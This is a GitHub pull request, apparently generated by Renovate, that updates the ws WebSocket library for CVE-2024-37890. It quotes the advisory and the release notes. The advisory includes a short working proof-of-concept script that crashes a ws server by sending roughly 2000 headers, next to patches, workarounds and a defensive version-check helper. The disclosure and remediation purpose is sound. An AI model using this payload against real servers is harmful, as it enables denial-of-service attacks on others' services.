
chore(deps): update dependency ws to v8 [security] #7595

Status: Open. Wants to merge 1 commit into base branch develop.
Conversation


@live-github-bot live-github-bot bot commented Aug 13, 2024

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| ws | devDependencies | major | 7 -> 8 |
| ws | dependencies | minor | 8.17.1 -> 8.18.0 |

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.
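As an added example (not code from the Renovate PR or the ws project), two checks for triaging this advisory: whether an installed ws version is at or above the fixed release listed under Patches for its major line, and whether workaround 1 actually holds, i.e. whether the configured maxHeaderSize byte budget can even contain more than maxHeadersCount header lines. The 4-byte lower bound per header line ("a:\r\n") is this example's own conservative assumption.

```javascript
// Fixed releases per major line, as listed in the advisory's Patches section.
const FIXED_VERSIONS = { 8: [8, 17, 1], 7: [7, 5, 10], 6: [6, 2, 3], 5: [5, 2, 4] };

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`not a semver version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// True when `version` carries the fix for its major line. Majors below 5 have
// no listed backport and are treated as unpatched; majors above 8 are assumed
// (this example's assumption) to inherit the fix.
function isPatchedWsVersion(version) {
  const v = parseVersion(version);
  const fixed = FIXED_VERSIONS[v[0]];
  if (!fixed) return v[0] > 8;
  return compareVersions(v, fixed) >= 0;
}

// Assumption: "a:\r\n" (1-char name, colon, CRLF) is the shortest header line.
const MIN_HEADER_LINE_BYTES = 4;

// Workaround 1 only holds if the byte budget cannot hold more header lines
// than maxHeadersCount. With Node defaults (16384 bytes, 2000 headers) it does
// not hold. A maxHeadersCount of 0 is workaround 2: no count limit at all.
function headerLimitsConsistent(maxHeaderSize, maxHeadersCount) {
  if (maxHeadersCount === 0) return true;
  return Math.floor(maxHeaderSize / MIN_HEADER_LINE_BYTES) <= maxHeadersCount;
}

// Options for a server that cannot be upgraded yet: shrink maxHeaderSize until
// it is consistent with the header count. Usage (not run here):
//   const server = http.createServer(opts.serverOptions);
//   server.maxHeadersCount = opts.maxHeadersCount;
function hardenedServerOptions(maxHeadersCount = 2000) {
  return {
    serverOptions: { maxHeaderSize: maxHeadersCount * MIN_HEADER_LINE_BYTES - 1 },
    maxHeadersCount,
  };
}
```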

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.


Release Notes

websockets/ws (ws)

v8.0.0


Breaking changes

  • The WebSocket constructor now throws a SyntaxError if any of the
    subprotocol names are invalid or duplicated (0aecf0c).

  • The server now aborts the opening handshake if an invalid
    Sec-WebSocket-Protocol header field value is received (1877dde).

  • The protocols argument of the handleProtocols hook is no longer an Array but
    a Set (1877dde).

  • The opening handshake is now aborted if the Sec-WebSocket-Extensions header
    field value is empty or begins or ends with whitespace (e814110).

  • Dropped support for Node.js < 10.0.0 (552b506).

  • The WebSocket constructor now throws a SyntaxError if the connection URL
    contains a fragment identifier or if the URL's protocol is not one of 'ws:',
    'wss:', or 'ws+unix:' (ebea038).

  • Text messages and close reasons are no longer decoded to strings. They are
    passed as Buffers to the listeners of their respective events. The listeners
    of the 'message' event now take a boolean argument specifying whether or not
    the message is binary (e173423).

    Existing code can be migrated by decoding the buffer explicitly.

    websocket.on('message', function message(data, isBinary) {
      const message = isBinary ? data : data.toString();
      // Continue as before.
    });
    
    websocket.on('close', function close(code, data) {
      const reason = data.toString();
      // Continue as before.
    });
  • The package now uses an ES module wrapper (78adf5f).

  • WebSocketServer.prototype.close() no longer closes existing connections
    (df7de57).

    Existing code can be migrated by closing the connections manually.

    websocketServer.close();
    for (const ws of websocketServer.clients) {
      ws.terminate();
    }
  • The callback of WebSocketServer.prototype.close() is now called with an
    error if the server is already closed (abde9cf).

  • WebSocket.prototype.addEventListener() is now a noop if the type argument
    is not one of 'close', 'error', 'message', or 'open' (9558ed1).

  • WebSocket.prototype.removeEventListener() now only removes listeners added
    with WebSocket.prototype.addEventListener() and only one at time (ea95d9c).

  • The value of the onclose, onerror, onmessage, and onopen properties is
    now null if the respective event handler is not set (6756cf5).

  • The OpenEvent class has been removed (21e6500).

Bug fixes

  • The event listeners added via handler properties are now independent from the
    event listeners added with WebSocket.prototype.addEventListener()
    (0b21c03).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


This PR has been generated by Renovate Bot.

vercel bot commented Aug 13, 2024

The latest updates on your projects.

5 Skipped Deployments

| Name | Status | Updated (UTC) |
|---|---|---|
| ledger-live-docs | Ignored | Jan 17, 2025 11:11pm |
| ledger-live-github-bot | Ignored | Jan 17, 2025 11:11pm |
| native-ui-storybook | Ignored | Jan 17, 2025 11:11pm |
| react-ui-storybook | Ignored | Jan 17, 2025 11:11pm |
| web-tools | Ignored | Jan 17, 2025 11:11pm |
socket-security bot commented Aug 13, 2024

Removed dependencies detected.

🚮 Removed packages: npm/ws@8.17.1
